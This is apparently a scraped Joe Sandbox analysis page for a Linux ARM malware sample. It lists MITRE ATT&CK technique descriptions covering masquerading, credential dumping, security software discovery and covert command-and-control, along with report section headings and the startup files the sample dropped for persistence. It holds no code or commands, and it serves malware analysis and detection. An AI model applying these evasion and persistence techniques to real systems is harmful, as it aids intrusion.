Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report arm.nn-20241224-0652.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/arm.nn-20241224-0652.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/tmp/qemu-open.GmV2rd (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: arm.nn-20241224-0652.elf PID: 5409, Parent PID: 5335

General

Chronological Activities

Analysis Process: arm.nn-20241224-0652.elf PID: 5426, Parent PID: 5409

General

Chronological Activities

Analysis Process: sh PID: 5426, Parent PID: 5409

Linux Analysis Report
arm.nn-20241224-0652.elf